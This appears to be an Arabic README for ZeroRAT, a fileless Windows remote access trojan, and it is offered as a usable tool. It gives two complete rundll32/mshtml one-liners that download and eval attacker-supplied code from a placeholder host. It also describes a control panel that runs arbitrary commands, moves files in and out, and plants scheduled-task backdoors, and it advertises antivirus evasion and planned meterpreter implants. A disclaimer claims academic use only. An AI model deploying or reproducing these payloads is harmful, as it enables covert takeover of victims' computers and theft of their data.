
ZeroRAT هو أداة تحكم عن بُعد ذات سطر واحد تعمل على نظام ويندوز.
#ZeroRAT ##مقدمة أداة تحكم عن بعد (RAT) لنظام ويندوز، يحتاج العميل فقط إلى تنفيذ أمر واحد. تستخدم برامج ويندوز الأصلية للتنفيذ، ولا تكتب أي ملفات على القرص، مما يمنحها ميزة الإفلات من برامج مكافحة الفيروسات بشكل طبيعي. لا تصمد بعد إعادة التشغيل.
في البرنامج، يتم اعتبار التنزيل (download) والرفع (upload) من منظور العميل. عندما يقوم العميل بتنزيل ملف من الخادم، يُسمى ذلك تنزيلاً (download)، وعندما يرفع العميل ملفًا إلى الخادم، يُسمى ذلك رفعاً (upload).
##الإعدادات
قم بتعديل عنوان اتصال العميل وكلمة مرور لوحة التحكم الخلفية في ملف config.py، وتأكد من إيقاف وضع التصحيح (debug).
يعتمد البرنامج على flask و sqlite3، قم بتثبيتهما باستخدام pip.
##العميل
استبدل <ip>:<port> بعنوان الاتصال الفعلي.
الإصدار العادي
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
الإصدار المستمر
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##الخادم
لوحة التحكم: http://<ip>:<port>/server/
الأوامر التي يدعمها الخادم:
sessions قائمة العملاء النشطينuse <id> تحديد عميل حسب المعرفset <key> <value> تعيين متغير عامshow globals/downloads/uploads عرض المتغيرات العامة، الملفات التي يمكن للعميل تنزيلها، والملفات التي رفعها العميلdelete session حذف العميل الحاليdelete download/upload <id> حذف الملف حسب المعرفupfile رفع ملف إلى الخادم وإضافته إلى قائمة التنزيلاتdownload بعد تعيين المتغيرين download_file و download_save_path، يمكن للعميل تنزيل الملف وحفظه في المسار المحددupload بعد تعيين متغير upload_file، يمكن للعميل رفع الملف المحدد إلى الخادمbackdoor tasks <time> استخدام جدول مهام ويندوز لإنشاء باب خلفي، صيغة الوقت 00:00بخلاف الأوامر المذكورة أعلاه، سيتم تنفيذ أي أمر آخر كأمر نظام ويندوز.
لمزيد من التفاصيل حول الأوامر، انظر /static/js/xkcd_cli.js
##التطوير صيانة أوامر العميل (الواجهة الخلفية): /static/js/xkcd_cli.js
صيانة أوامر الخادم (الواجهة الخلفية): /controllers/server.py
صيانة العميل: /controllers/client.py
توليد حمولة العميل: payload.py
عمليات قاعدة البيانات: /models/
##معلومات الاتصال http://5alt.me
md5_salt [AT] qq.com
##المراجع https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##إخلاء المسؤولية عند استخدام هذه الأداة، يرجى الالتزام بالقوانين المحلية. يُسمح باستخدامها فقط للأغراض الأكاديمية والاختبارية، ويُحظر بشدة السيطرة غير القانونية على أجهزة الآخرين. إذا تسبب الاستخدام في أي ضرر، فإن المؤلف غير مسؤول عنه.
##الترخيص GPLV3
##المهام المستقبلية
backdoor wmi استخدام WMI لإنشاء باب خلفي، يُنفذ كل ساعةmeterpreter shellcode استخدام InstallUtil لتنفيذ shellcode لزرع meterpreter، يجب تعيين LHOST و LPORT أولاً (يمكن استقبال الأوامر بعد الترحيل، يعتمد على .NET Framework 2.0)meterpreter powershell زرع meterpreter عبر Powershell (يعتمد على Powershell 1.0)